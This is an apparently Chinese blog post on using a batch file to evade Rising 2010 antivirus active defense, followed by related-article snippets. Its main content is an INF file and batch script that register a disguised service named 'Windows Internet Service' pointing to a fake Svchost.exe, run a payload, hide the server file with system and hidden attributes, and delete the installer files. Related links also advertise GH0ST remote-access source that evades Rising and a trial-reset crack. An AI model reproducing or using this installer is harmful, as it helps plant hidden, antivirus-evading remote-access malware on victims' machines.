`

bat的写过瑞星2010主动防御的方法

WindowsF#.net 
阅读更多

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]   
DisplayName=Windows Internet Service   //服务名
Description=Provides to the Internet information service management support 。   //服务描述
ServiceType=0x10   //服务类型为独立进程服务
StartType=2     //由SCM(服务控制管理器)自动启动
ErrorControl=0   //错误控制忽略
ServiceBinary=%10%\Svchost.exe  //服务程序位置

这是我们要新建的inf内容,后面有注释哈,我就不多解释了~
我们可以用rundll32.exe来将这个文件注册成系统服务,用如下命令:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 +你的inf文件路径

现在来看看我修改过后的bat.bat文件:
@echo off //隐藏窗口
@rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %systemroot%\system32\inetsvr.inf //注册服务
@%systemroot%\system32\run.exe //运行
@attrib +a +s +h %systemroot%\Svchost.exe   //隐藏服务端文件
@net start inetsvr   //启动服务
@del /q /f /s %systemroot%\system32\inetsvr.inf   //下面的都是删除用过的文件了
@del /q /f /s %systemroot%\system32\run.exe
@del /q /f /s %systemroot%\system32\bat.vbs
@del /q /f /s %systemroot%\system32\bat.bat


只是把reg文件给换成了inf文件
分享到:
| 十六进制转成十进制
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    GH0ST源码过瑞星主动

    【标题】"GH0ST源码过瑞星主动"指的是一个针对瑞星主动防御机制的规避技术,涉及到了恶意软件的开发与反病毒软件的绕过策略。GH0ST是一种远程访问工具(RAT),通常被用作恶意软件,允许攻击者在目标计算机上进行...

    bat 运行java main方法

    在这个场景下,`bat`文件被用来启动包含`main`方法的Java程序。`main`方法是Java程序的入口点,按照`public static void main(String[] args)`的格式定义。接下来,我们将详细探讨如何创建和使用`bat`文件来运行Java...

    BAT写入启动项的方法

    ### BAT写入启动项的方法 #### 背景与意义 在Windows系统中,通过编写批处理文件(BAT文件)可以实现很多自动化操作。其中一项常见的需求是将某些任务设置为开机自动运行,即添加到系统的启动项中。本文将详细介绍...

    电脑怎样写一个bat启用USB接口

    电脑怎样写一个bat启用USB接口

    bat脚本写文件

    bat脚本写文件,通过批处理脚本写文件到指定目录

    图片批量重命名方法(bat命令).docx

    图片批量重命名方法(bat命令) 本文将详细介绍使用bat命令批量重命名图片的方法,整个过程分为四步,首先使用bat命令批量提取图片名称,接着使用Excel快速重命名,最后使用REN命令完成批量重命名。整个过程无需...

    C#调用bat文件 bat处理 c#调用bat

    5. 启动bat文件:最后,使用`Process`对象的`Start`方法启动bat文件。 ```csharp process.Start(); ``` 6. 示例代码:结合上述步骤,一个简单的C#按钮事件处理函数示例如下: ```csharp private void button1_Click...

    cmd与网关转换,bat写的

    用bat命令写的网关转换工具 cmd与网关转换,bat写的

    微点主动防御循环试用

    描述中提到的“微点主动防御循环试用补丁”可能是一种特别设计的程序或工具,它能够帮助用户在不重启或卸载软件的情况下多次注册试用版,这通常是通过修改或绕过软件的试用计时器来实现的。"带GUI界面"指的是该工具...

    bat转vbs,相当于隐藏运行bat

    隐藏运行BAT文件的方法适用于那些不希望用户看到执行过程的场景,比如系统维护、自动更新、后台数据处理等。同时,这种转换也有助于保护批处理脚本的源代码,因为VBS文件的可读性相比BAT文件要低,不容易被普通用户...

    BAT批处理脚本-瑞星杀毒软件2008批处理版.zip

    标题中的“BAT批处理脚本-瑞星杀毒软件2008批处理版.zip”表明这是一个关于使用批处理(Batch)脚本来自动化操作瑞星杀毒软件2008的压缩文件。批处理脚本是Windows操作系统中的一种简单编程方式,它允许用户通过编写...

    经典BAT批处理文件语法教程及使用方法.doc

    经典BAT批处理文件语法教程及使用方法 本文将详细讲述BAT批处理文件的语法、使用方法和编程技术。BAT批处理文件是一种文本文件,每一行都是一个DOS命令,可以使用DOS下的Edit或Windows的记事本等文本编辑工具创建和...

    bat批量删除脚本编写方法

    Bat批量删除脚本编写方法 Bat批量删除脚本编写方法是使用Bat脚本语言编写的一种批量删除文件的方法。该方法使用DEL命令来删除指定的文件或文件夹,并可以根据不同的选项来控制删除的行为。 DEL命令是Bat脚本中用来...

    U.bat和u.vbe 脚本病毒处理方法

    U.bat和u.vbe 脚本病毒处理方法U.bat和u.vbe 脚本病毒处理方法U.bat和u.vbe 脚本病毒处理方法U.bat和u.vbe 脚本病毒处理方法U.bat和u.vbe 脚本病毒处理方法U.bat和u.vbe 脚本病毒处理方法

    bat-迷宫游戏-dos脚本

    `主程序无敌版.bat`可能是为游戏添加了无敌模式的特殊版本,可能包含了一些修改过的逻辑或条件判断,使玩家角色不受限制地通过迷宫。 `go.bat`, `to.bat`, `sd.bat`这些文件名可能是游戏中的功能脚本,比如"go"可能...

    bat后台执行实现bat后台执行实现

    根据给定文件的信息,本文将围绕“bat后台执行”的主题展开详细讨论,旨在解析如何在Windows环境下通过批处理脚本(.bat文件)实现程序或命令的后台运行,并结合部分提供的内容进行具体分析。 ### 一、理解bat后台...

    新年祝福bat

    这不是过年了吗马上,所以我写了个bat代码,为了给远方的朋友一个祝福

    arp攻击dos防御bat

    arp攻击dos防御bat,需要根据自己情况修改网关ip及mac,使用ipconfig/all可以查看ip及mac

    BAT实例:随机抽数程序

    BAT实例,随机抽数程序,设置取值范围最大值,抽取这个值以内的任意一个数,带循环系统,界面简洁实用,可以用在抽取学号

    随手写 .bat 版

    随手写 .bat 版 用不着那么些别的软件,就它啦。

Magicbox
Global site tag (gtag.js) - Google Analytics